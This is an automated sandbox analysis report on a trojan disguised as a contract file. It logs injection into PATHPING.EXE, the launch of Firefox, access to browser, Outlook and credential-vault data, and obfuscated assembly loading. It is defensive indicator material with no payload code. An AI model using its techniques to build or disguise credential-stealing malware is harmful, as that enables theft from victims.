                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033N
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: PATHPING.EXE, 00000007.00000003.2266500855.0000000007D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: PATHPING.EXE, 00000007.00000002.4138180842.0000000006340000.00000004.00000800.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4136306334.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000044FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: draft contract for order #782334.exe
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07912D48 NtQueryInformationProcess,0_2_07912D48
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07912D40 NtQueryInformationProcess,0_2_07912D40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0042C343 NtClose,2_2_0042C343
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742B60 NtClose,LdrInitializeThunk,2_2_01742B60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01742DF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01742C70
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017435C0 NtCreateMutant,LdrInitializeThunk,2_2_017435C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01744340 NtSetContextThread,2_2_01744340
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01744650 NtSuspendThread,2_2_01744650
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BF0 NtAllocateVirtualMemory,2_2_01742BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BE0 NtQueryValueKey,2_2_01742BE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BA0 NtEnumerateValueKey,2_2_01742BA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742B80 NtQueryInformationFile,2_2_01742B80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AF0 NtWriteFile,2_2_01742AF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AD0 NtReadFile,2_2_01742AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AB0 NtWaitForSingleObject,2_2_01742AB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D30 NtUnmapViewOfSection,2_2_01742D30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D10 NtMapViewOfSection,2_2_01742D10
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D00 NtSetInformationFile,2_2_01742D00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DD0 NtDelayExecution,2_2_01742DD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DB0 NtEnumerateKey,2_2_01742DB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C60 NtCreateKey,2_2_01742C60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C00 NtQueryInformationProcess,2_2_01742C00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CF0 NtOpenProcess,2_2_01742CF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CC0 NtQueryVirtualMemory,2_2_01742CC0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CA0 NtQueryInformationToken,2_2_01742CA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F60 NtCreateProcessEx,2_2_01742F60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F30 NtCreateSection,2_2_01742F30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FE0 NtCreateFile,2_2_01742FE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FB0 NtResumeThread,2_2_01742FB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FA0 NtQuerySection,2_2_01742FA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F90 NtProtectVirtualMemory,2_2_01742F90
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742E30 NtWriteVirtualMemory,2_2_01742E30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742EE0 NtQueueApcThread,2_2_01742EE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742EA0 NtAdjustPrivilegesToken,2_2_01742EA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742E80 NtReadVirtualMemory,2_2_01742E80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743010 NtOpenDirectoryObject,2_2_01743010
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743090 NtSetValueKey,2_2_01743090
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017439B0 NtGetContextThread,2_2_017439B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743D70 NtOpenThread,2_2_01743D70
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743D10 NtOpenProcessToken,2_2_01743D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03684340 NtSetContextThread,LdrInitializeThunk,7_2_03684340
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03684650 NtSuspendThread,LdrInitializeThunk,7_2_03684650
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682B60 NtClose,LdrInitializeThunk,7_2_03682B60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03682BE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03682BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03682BA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682AF0 NtWriteFile,LdrInitializeThunk,7_2_03682AF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682AD0 NtReadFile,LdrInitializeThunk,7_2_03682AD0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682F30 NtCreateSection,LdrInitializeThunk,7_2_03682F30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682FE0 NtCreateFile,LdrInitializeThunk,7_2_03682FE0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682FB0 NtResumeThread,LdrInitializeThunk,7_2_03682FB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03682EE0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03682E80
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03682D30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03682D10
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03682DF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682DD0 NtDelayExecution,LdrInitializeThunk,7_2_03682DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682C60 NtCreateKey,LdrInitializeThunk,7_2_03682C60
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03682C70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03682CA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_036835C0 NtCreateMutant,LdrInitializeThunk,7_2_036835C0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_036839B0 NtGetContextThread,LdrInitializeThunk,7_2_036839B0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682B80 NtQueryInformationFile,7_2_03682B80
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682AB0 NtWaitForSingleObject,7_2_03682AB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682F60 NtCreateProcessEx,7_2_03682F60
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682FA0 NtQuerySection,7_2_03682FA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682F90 NtProtectVirtualMemory,7_2_03682F90
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682E30 NtWriteVirtualMemory,7_2_03682E30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682EA0 NtAdjustPrivilegesToken,7_2_03682EA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682D00 NtSetInformationFile,7_2_03682D00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682DB0 NtEnumerateKey,7_2_03682DB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682C00 NtQueryInformationProcess,7_2_03682C00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682CF0 NtOpenProcess,7_2_03682CF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03682CC0 NtQueryVirtualMemory,7_2_03682CC0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03683010 NtOpenDirectoryObject,7_2_03683010
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03683090 NtSetValueKey,7_2_03683090
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03683D70 NtOpenThread,7_2_03683D70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_03683D10 NtOpenProcessToken,7_2_03683D10
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02BC8E70 NtDeleteFile,7_2_02BC8E70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02BC8F20 NtClose,7_2_02BC8F20
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02BC8C00 NtCreateFile,7_2_02BC8C00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02BC8D70 NtReadFile,7_2_02BC8D70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02BC9090 NtAllocateVirtualMemory,7_2_02BC9090
                Source: draft contract for order #782334.exe, 00000000.00000002.1772436889.000000000BBA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000000.00000000.1657606206.0000000000DDA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehmRI.exe: vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000000.00000002.1756323180.000000000135E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepathping.exej% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000017FD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepathping.exej% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe Binary or memory string: OriginalFilenamehmRI.exe: vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: draft contract for order #782334.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.cs Security API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/11
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\draft contract for order #782334.exe.log
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\PATHPING.EXE File created: C:\Users\user\AppData\Local\Temp\6276I39
                Source: draft contract for order #782334.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: PATHPING.EXE, 00000007.00000003.2269109498.0000000003168000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2268237865.0000000003146000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4134882508.0000000003168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: draft contract for order #782334.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: version.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: draft contract for order #782334.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: draft contract for order #782334.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: draft contract for order #782334.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pathping.pdb source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RprkEKYwQARXc.exe, 00000006.00000000.2004979682.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4134690606.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdbSHA256 source: draft contract for order #782334.exe
                Source: Binary string: wntdll.pdb source: draft contract for order #782334.exe, draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdb source: draft contract for order #782334.exe

                Data Obfuscation

                Source: draft contract for order #782334.exe, Form1.cs.Net Code: InitializeComponent
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
